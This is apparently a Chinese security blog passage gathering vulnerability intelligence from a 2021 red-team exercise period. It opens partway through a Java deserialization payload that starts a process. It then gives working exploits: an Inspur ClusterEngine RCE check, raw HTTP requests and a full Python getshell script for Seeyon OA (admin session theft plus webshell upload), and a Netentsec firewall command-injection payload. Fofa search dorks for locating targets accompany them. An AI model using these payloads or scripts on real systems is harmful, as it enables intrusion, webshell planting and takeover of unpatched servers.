                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>calc.exe</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>

其他信息

4月10日9时,网爆OneBl**小于等于v2.2.1远程命令执行,poc已流出
CVE-2021-24086,Windows TCP/IP拒绝服务漏洞POC已公开

Chrome 命令执行(需要关闭Google沙箱,不排除存在绕过沙箱的可能) //https://www.cnblogs.com/KHZ521/p/14654233.html

4月11-4月12安全情报

浪潮 ClusterEngineV4.0 任意命令执行

漏洞关注点

/alarmConfig

fofa_dork

title="TSCEV4.0"

POC

地址 : https://github.com/xiaoshu-bit/ClusterEngineRce

pip3 install -r requirements.txt
python3 clusterengine_poc.py -u http://127.0.0.1:1111
def verify(self, first=False):
        target = self.scan_info['Target']
        verbose = self.scan_info['Verbose']
        headers = {
            "Content-Type": "application/x-www-form-urlencoded"
        }
        payload = "op=login&username=asd&password=asd'"
        try:
            url = urljoin(target, '/login')
            resp = req(url, 'post', data=payload,headers=headers,verify=False)
            if ('{"err"' in resp.text) and (" syntax error: unexpected end of file" in resp.text):
                log.highlight("found Inspur ClusterEngine v4.0 Remote Code Execution")
                self.scan_info['Success'] = True
                self.scan_info['Ret']['VerifyInfo']['URL'] = url
                self.scan_info['Ret']['VerifyInfo']['Payload'] = payload
                self.scan_info['Ret']['VerifyInfo']['method'] = "POST"
                return
        except Exception as e:
            log.info("[*]Request to target URL fail! {}".format(e))

2021HW期间公布的部分漏洞及利用方式

志远OA session泄露&&任意文件上传漏洞

漏洞描述

致远OA通过发送特殊请求获取session,在通过文件上传接口上传webshell控制服务器

fofa

title="致远"

漏洞复现

首先是一个获取管理cookie的漏洞。然后上传压缩文件进行解压。达到getshell的目的

POST /seeyon/thirdpartyController.do HTTP/1.1
Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 133
Content-Type: application/x-www-form-urlencoded

method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

上传压缩包

POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:192.168.10.2
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5
Content-Length: 841
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b

--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="firstSave"
true
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="callMethod"
resizeLayout
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="isEncrypt"
0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="takeOver"
false
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="type"
0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="file1"; filename="11.png"
Content-Type: image/png
111
--59229605f98b8cf290a7b8908b34616b--

然后解压

POST /seeyon/ajax.do HTTP/1.1
Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=BDF7358D4C35C6D2BB99FADFEE21F913
Content-Length: 157

method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%222021-04-09%22%2C%225818374431215601542%22%5D

getshell 脚本

# coding: utf-8
import requests
import re
import time
proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}
def seeyon_new_rce(targeturl):
    orgurl = targeturl
    # 通过请求直接获取管理员权限cookie
    targeturl = orgurl + 'seeyon/thirdpartyController.do'
    post={"method":"access","enc":"TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4","clientPath":"127.0.0.1"}
    response = requests.post(url=targeturl,data=post,proxies=proxy, timeout=60,verify=False)
    rsp = ""
    if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower():
        cookies = response.cookies
        cookies = requests.utils.dict_from_cookiejar(cookies)
        # 上传压缩文件
        aaa=cookies['JSESSIONID']
        print(aaa)
        targeturl = orgurl + 'seeyon/fileUpload.do?method=processUpload'
        files = [('file1', ('11.png', open('1.zip', 'r'), 'image/png'))]
        print()
        headers = {'Cookie':"JSESSIONID=%s"%aaa}
        data = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0',
                'isEncrypt': "0"}
        response = requests.post(url=targeturl,files=files,data=data, headers=headers,proxies=proxy,timeout=60,verify=False)
        if response.text:
            reg = re.findall('fileurls=fileurls\+","\+\'(.+)\'',response.text,re.I)
            print(reg)
            if len(reg)==0:
                exit("匹配失败")
            fileid=reg[0]
            targeturl = orgurl + 'seeyon/ajax.do'
            datestr = time.strftime('%Y-%m-%d')
            post = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + datestr + '%22%2C%22' + fileid + '%22%5D'
            #headers = {'Cookie': cookies}
            headers['Content-Type']="application/x-www-form-urlencoded"
            response = requests.post(targeturl, data=post,headers=headers,proxies=proxy,timeout=60,verify=False)
            print(response.text)
seeyon_new_rce("https://baidu.com/")

shell地址:/seeyon/common/designer/pageLayout/a2345678.jsp

网康下一代防火墙RCE

漏洞位置

/directdata/direct/router

POC

POST /directdata/direct/router HTTP/1.1
Host: 192.168.10.6
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=q885n85a5es9i83d26rm102sk3; ys-active_page=s%3A
Content-Type: application/x-www-form-urlencoded
Content-Length: 160

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami>/var/www/html/1.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

2021HW期间公布的部分漏洞及利用方式

其他信息

4月12日14时 最新发现天擎终端安全管理系统控制台存在远程命令执行漏洞,poc疑似已流出
4月12日12时 最新发现讯雷11存在二进制漏洞
4月12日12时 传出PHP zerodiMQ后门漏洞,poc已流出
4月12日10时 传出fastjson 1.2.75  绕过RCE漏洞,poc疑似已流出
上一篇:Vue(5): APP.vue引入CSS样式文件和动态切换组件的方法


下一篇:操作符重载